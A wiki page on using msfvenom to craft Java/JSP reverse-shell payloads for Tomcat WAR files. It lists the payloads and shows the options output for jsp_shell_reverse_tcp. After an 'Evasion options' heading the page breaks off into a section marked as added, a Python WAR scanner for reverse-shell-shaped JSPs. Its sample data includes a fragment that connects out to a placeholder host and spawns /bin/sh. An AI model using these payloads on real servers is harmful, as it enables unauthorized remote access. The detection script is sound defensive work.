From charlesreid1


Revision as of 04:41, 30 March 2016

msfvenom can be used to craft payloads such as remote TCP shells.

See this tool in action: Metasploitable/Apache/DAV

Creating Payloads

Tomcat

To create a WAR file that would give a reverse shell, I used msfvenom to generate the payload.

I started by listing all the available payloads so I could look for the Java-related ones:

root@morpheus:~/box/besside# msfvenom -l payloads

Framework Payloads (437 total)
==============================

    Name                                                Description
    ----                                                -----------
    java/jsp_shell_bind_tcp                             Listen for a connection and spawn a command shell
    java/jsp_shell_reverse_tcp                          Connect back to attacker and spawn a command shell
    java/meterpreter/bind_tcp                           Run a meterpreter server in Java. Listen for a connection
    java/meterpreter/reverse_http                       Run a meterpreter server in Java. Tunnel communication over HTTP
    java/meterpreter/reverse_https                      Run a meterpreter server in Java. Tunnel communication over HTTPS
    java/meterpreter/reverse_tcp                        Run a meterpreter server in Java. Connect back stager
    java/shell/bind_tcp                                 Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection
    java/shell/reverse_tcp                              Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
    java/shell_reverse_tcp                              Connect back to attacker and spawn a command shell

For a Tomcat WAR you probably want java/jsp_shell_reverse_tcp or java/meterpreter/reverse_tcp.

jsp shell reverse tcp

Here are the options:

root@morpheus:~/box/besside# msfvenom -p java/jsp_shell_reverse_tcp --payload-options
Options for payload/java/jsp_shell_reverse_tcp:


       Name: Java JSP Command Shell, Reverse TCP Inline
     Module: payload/java/jsp_shell_reverse_tcp
   Platform: Linux, OSX, Solaris, Unix, Windows
       Arch: java
Needs Admin: No
 Total size: 0
       Rank: Normal

Provided by:
    sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port
SHELL                   no        The system shell to use.

Description:
  Connect back to attacker and spawn a command shell


Advanced options for payload/java/jsp_shell_reverse_tcp:

    Name           : AutoRunScript
    Current Setting:
    Description    : A script to run automatically on session creation.

    Name           : InitialAutoRunScript
    Current Setting:
    Description    : An initial script to run on session creation (before
       AutoRunScript)

    Name           : ReverseAllowProxy
    Current Setting: false
    Description    : Allow reverse tcp even with Proxies specified. Connect back
       will NOT go through proxy but directly to LHOST

    Name           : ReverseConnectRetries
    Current Setting: 5
    Description    : The number of connection attempts to try before exiting the
       process

    Name           : ReverseListenerBindAddress
    Current Setting:
    Description    : The specific IP address to bind to on the local system

    Name           : ReverseListenerBindPort
    Current Setting:
    Description    : The port to bind to on the local system if different from LPORT

    Name           : ReverseListenerComm
    Current Setting:
    Description    : The specific communication channel to use for this listener

    Name           : ReverseListenerThreaded
    Current Setting: false
    Description    : Handle every connection in a new thread (experimental)

    Name           : VERBOSE
    Current Setting: false
    Description    : Enable detailed status messages

    Name           : WORKSPACE
    Current Setting:
    Description    : Specify the workspace for this module

Evasion options for payload/java/jsp_shell_reverse_tcp:
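The defender-side counterpart to the procedure above, as an added example that is not part of the original page and not Metasploit's own code: a small audit script that opens a Tomcat WAR and flags any JSP that combines an outbound java.net.Socket with a process spawn (Runtime.exec or ProcessBuilder). It assumes that an inline JSP reverse shell of the kind java/jsp_shell_reverse_tcp produces has exactly that shape, matching the "Connect back to attacker and spawn a command shell" description and the SHELL option above; the WAR and the three JSPs inside it are constructed sample data, and "LHOST_PLACEHOLDER" is a placeholder, not a real address.

```python
"""Audit a Tomcat WAR for JSPs that have the shape of an inline reverse shell.

Added example, not from the original page or from Metasploit. Assumption
(labelled): a JSP reverse-shell payload combines an outbound java.net.Socket
with a process spawn (Runtime.exec / ProcessBuilder) in one file. The WAR and
its JSPs built below are constructed sample data.
"""
import io
import re
import zipfile

# Indicator patterns. A single hit (exec alone) shows up in legitimate admin
# pages; the combination of socket + spawn in one JSP is what gets flagged.
SPAWN_RE = re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\(|new\s+ProcessBuilder\s*\(")
SOCKET_RE = re.compile(r"new\s+(?:java\.net\.)?Socket\s*\(")
STREAM_RE = re.compile(r"getInputStream\(\)|getOutputStream\(\)")


def classify_jsp(source: str) -> dict:
    """Return which indicators a JSP source contains plus a verdict."""
    spawn = bool(SPAWN_RE.search(source))
    sock = bool(SOCKET_RE.search(source))
    streams = bool(STREAM_RE.search(source))
    return {
        "spawns_process": spawn,
        "opens_socket": sock,
        "pipes_streams": streams,
        # Verdict: socket and process spawn in the same JSP is the reverse-shell shape.
        "suspicious": spawn and sock,
    }


def scan_war(war_bytes: bytes) -> list:
    """Walk every .jsp/.jspx entry of a WAR (a zip archive) and return
    (entry_name, indicator dict) for each entry judged suspicious."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        for info in war.infolist():
            if not info.filename.lower().endswith((".jsp", ".jspx")):
                continue
            text = war.read(info).decode("utf-8", errors="replace")
            result = classify_jsp(text)
            if result["suspicious"]:
                findings.append((info.filename, result))
    return findings


# --- constructed sample WAR ---------------------------------------------
BENIGN_JSP = """<%@ page language="java" %>
<html><body>Hello, <%= request.getParameter("name") %></body></html>
"""

# Constructed fragment with the reverse-shell shape: outbound socket plus a
# spawned shell. Only the indicator statements, not a working payload;
# LHOST_PLACEHOLDER is a placeholder.
SUSPICIOUS_JSP = """<%@ page import="java.net.*,java.io.*" %>
<%
    Socket s = new Socket("LHOST_PLACEHOLDER", 4444);
    Process p = Runtime.getRuntime().exec("/bin/sh");
    InputStream is = p.getInputStream();
    OutputStream os = s.getOutputStream();
%>
"""

# Contains exec but no socket: a questionable local status page, included to
# show that one indicator on its own is not enough to flag.
EXEC_ONLY_JSP = """<% Process p = Runtime.getRuntime().exec("uptime"); %>"""


def build_sample_war() -> bytes:
    """Build an in-memory WAR holding the three constructed JSPs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", "<web-app/>")
        war.writestr("index.jsp", BENIGN_JSP)
        war.writestr("status.jsp", EXEC_ONLY_JSP)
        war.writestr("cmd.jsp", SUSPICIOUS_JSP)
    return buf.getvalue()


if __name__ == "__main__":
    # Only cmd.jsp is reported; status.jsp has exec without a socket.
    for name, result in scan_war(build_sample_war()):
        print(f"{name}: {result}")
```

Point scan_war at the bytes of any WAR pulled from a Tomcat webapps directory; the two-indicator rule keeps exec-only admin pages out of the findings while still catching the socket-plus-shell pattern the payload above is built around.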